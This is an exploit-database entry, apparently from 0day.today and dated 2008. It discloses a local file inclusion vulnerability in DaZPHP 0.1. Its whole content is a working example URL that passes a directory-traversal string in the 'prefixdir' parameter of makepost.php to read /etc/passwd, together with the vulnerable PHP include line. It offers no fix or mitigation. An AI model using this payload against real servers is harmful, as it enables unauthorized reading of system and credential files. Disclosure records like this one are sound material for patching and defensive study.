id: 2801
date: 04/01/2008
title: DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability
author: w0cker
cves: 

=========================================================
DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability
=========================================================



Script Name : DaZPHP

Vul Code[Example] : http://[site]/[Path]/makepost.php?prefixdir=../../../../../../etc/passwd

Error : include "./".$prefixdir."/DaZPHPNews-0.1-1/makepost.php";



#  0day.today [2023-03-25]  #